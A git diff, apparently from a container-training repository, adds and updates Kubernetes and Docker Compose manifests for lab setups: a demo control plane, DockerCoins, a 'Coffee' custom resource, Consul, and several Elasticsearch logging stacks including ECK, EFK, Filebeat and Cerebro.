image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
@@ -5,6 +5,3 @@ RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
CMD ["ruby", "hasher.rb"]
|
||||
EXPOSE 80
|
||||
HEALTHCHECK \
|
||||
--interval=1s --timeout=2s --retries=3 --start-period=1s \
|
||||
CMD curl http://localhost/ || exit 1
|
||||
|
||||
@@ -2,14 +2,14 @@ version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch
|
||||
image: elasticsearch:2
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
logstash:
|
||||
image: logstash
|
||||
image: logstash:2
|
||||
command: |
|
||||
-e '
|
||||
input {
|
||||
@@ -47,7 +47,7 @@ services:
|
||||
- "12201:12201/udp"
|
||||
|
||||
kibana:
|
||||
image: kibana
|
||||
image: kibana:4
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
|
||||
21
k8s/canary.yaml
Normal file
21
k8s/canary.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
annotations:
|
||||
traefik.ingress.kubernetes.io/service-weights: |
|
||||
whatever: 90%
|
||||
whatever-new: 10%
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 80
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever-new
|
||||
servicePort: 80
|
||||
15
k8s/coffee-1.yaml
Normal file
15
k8s/coffee-1.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
apiVersion: apiextensions.k8s.io/v1beta1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
version: v1alpha1
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
|
||||
35
k8s/coffee-2.yaml
Normal file
35
k8s/coffee-2.yaml
Normal file
@@ -0,0 +1,35 @@
|
||||
apiVersion: apiextensions.k8s.io/v1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
versions:
|
||||
- name: v1alpha1
|
||||
served: true
|
||||
storage: true
|
||||
schema:
|
||||
openAPIV3Schema:
|
||||
properties:
|
||||
spec:
|
||||
required:
|
||||
- taste
|
||||
properties:
|
||||
taste:
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
type: string
|
||||
additionalPrinterColumns:
|
||||
- jsonPath: .spec.taste
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
name: Taste
|
||||
type: string
|
||||
- jsonPath: .metadata.creationTimestamp
|
||||
name: Age
|
||||
type: date
|
||||
29
k8s/coffees.yaml
Normal file
29
k8s/coffees.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: arabica
|
||||
spec:
|
||||
taste: strong
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: robusta
|
||||
spec:
|
||||
taste: stronger
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: liberica
|
||||
spec:
|
||||
taste: smoky
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: excelsa
|
||||
spec:
|
||||
taste: fruity
|
||||
|
||||
@@ -1,3 +1,33 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
@@ -24,6 +54,7 @@ spec:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
@@ -37,18 +68,11 @@ spec:
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.2.2"
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
image: "consul:1.6"
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=consul-0.consul.$(NAMESPACE).svc.cluster.local"
|
||||
- "-retry-join=consul-1.consul.$(NAMESPACE).svc.cluster.local"
|
||||
- "-retry-join=consul-2.consul.$(NAMESPACE).svc.cluster.local"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
|
||||
160
k8s/dockercoins.yaml
Normal file
160
k8s/dockercoins.yaml
Normal file
@@ -0,0 +1,160 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
69
k8s/eck-cerebro.yaml
Normal file
69
k8s/eck-cerebro.yaml
Normal file
@@ -0,0 +1,69 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: cerebro
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
spec:
|
||||
volumes:
|
||||
- name: conf
|
||||
configMap:
|
||||
name: cerebro
|
||||
containers:
|
||||
- image: lmenezes/cerebro
|
||||
name: cerebro
|
||||
volumeMounts:
|
||||
- name: conf
|
||||
mountPath: /conf
|
||||
args:
|
||||
- -Dconfig.file=/conf/application.conf
|
||||
env:
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
ports:
|
||||
- port: 9000
|
||||
protocol: TCP
|
||||
targetPort: 9000
|
||||
selector:
|
||||
app: cerebro
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: cerebro
|
||||
data:
|
||||
application.conf: |
|
||||
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
|
||||
|
||||
hosts = [
|
||||
{
|
||||
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
|
||||
name = "demo"
|
||||
auth = {
|
||||
username = "elastic"
|
||||
password = ${?ELASTICSEARCH_PASSWORD}
|
||||
}
|
||||
}
|
||||
]
|
||||
19
k8s/eck-elasticsearch.yaml
Normal file
19
k8s/eck-elasticsearch.yaml
Normal file
@@ -0,0 +1,19 @@
|
||||
apiVersion: elasticsearch.k8s.elastic.co/v1
|
||||
kind: Elasticsearch
|
||||
metadata:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
spec:
|
||||
http:
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
nodeSets:
|
||||
- name: default
|
||||
count: 1
|
||||
config:
|
||||
node.data: true
|
||||
node.ingest: true
|
||||
node.master: true
|
||||
node.store.allow_mmap: false
|
||||
version: 7.5.1
|
||||
168
k8s/eck-filebeat.yaml
Normal file
168
k8s/eck-filebeat.yaml
Normal file
@@ -0,0 +1,168 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.inputs:
|
||||
- type: container
|
||||
paths:
|
||||
- /var/log/containers/*.log
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
host: ${NODE_NAME}
|
||||
matchers:
|
||||
- logs_path:
|
||||
logs_path: "/var/log/containers/"
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# node: ${NODE_NAME}
|
||||
# hints.enabled: true
|
||||
# hints.default_config:
|
||||
# type: container
|
||||
# paths:
|
||||
# - /var/log/containers/*${data.kubernetes.container.id}.log
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
- add_host_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: filebeat
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
hostNetwork: true
|
||||
dnsPolicy: ClusterFirstWithHostNet
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat:7.5.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: demo-es-http
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
17
k8s/eck-kibana.yaml
Normal file
17
k8s/eck-kibana.yaml
Normal file
@@ -0,0 +1,17 @@
|
||||
apiVersion: kibana.k8s.elastic.co/v1
|
||||
kind: Kibana
|
||||
metadata:
|
||||
name: demo
|
||||
spec:
|
||||
version: 7.5.1
|
||||
count: 1
|
||||
elasticsearchRef:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
http:
|
||||
service:
|
||||
spec:
|
||||
type: NodePort
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
1802
k8s/eck-operator.yaml
Normal file
1802
k8s/eck-operator.yaml
Normal file
File diff suppressed because it is too large
Load Diff
128
k8s/efk.yaml
128
k8s/efk.yaml
@@ -3,7 +3,7 @@ apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
@@ -19,7 +19,6 @@ rules:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
@@ -33,23 +32,22 @@ subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
labels:
|
||||
k8s-app: fluentd-logging
|
||||
version: v1
|
||||
kubernetes.io/cluster-service: "true"
|
||||
app: fluentd
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: fluentd
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: fluentd-logging
|
||||
version: v1
|
||||
kubernetes.io/cluster-service: "true"
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
@@ -58,7 +56,7 @@ spec:
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
@@ -66,12 +64,12 @@ spec:
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
# X-Pack Authentication
|
||||
# =====================
|
||||
- name: FLUENT_ELASTICSEARCH_USER
|
||||
value: "elastic"
|
||||
- name: FLUENT_ELASTICSEARCH_PASSWORD
|
||||
value: "changeme"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
@@ -92,131 +90,87 @@ spec:
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "1"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
progressDeadlineSeconds: 600
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
run: elasticsearch
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5.6.8
|
||||
imagePullPolicy: IfNotPresent
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: elasticsearch
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
selfLink: /api/v1/namespaces/default/services/elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
run: elasticsearch
|
||||
sessionAffinity: None
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "1"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
name: kibana
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
|
||||
namespace: default
|
||||
spec:
|
||||
progressDeadlineSeconds: 600
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
run: kibana
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5.6.8
|
||||
imagePullPolicy: Always
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
run: kibana
|
||||
app: kibana
|
||||
name: kibana
|
||||
selfLink: /api/v1/namespaces/default/services/kibana
|
||||
namespace: default
|
||||
spec:
|
||||
externalTrafficPolicy: Cluster
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
run: kibana
|
||||
sessionAffinity: None
|
||||
app: kibana
|
||||
type: NodePort
|
||||
|
||||
21
k8s/elasticsearch-cluster.yaml
Normal file
21
k8s/elasticsearch-cluster.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
94
k8s/elasticsearch-operator.yaml
Normal file
94
k8s/elasticsearch-operator.yaml
Normal file
@@ -0,0 +1,94 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
167
k8s/filebeat.yaml
Normal file
167
k8s/filebeat.yaml
Normal file
@@ -0,0 +1,167 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
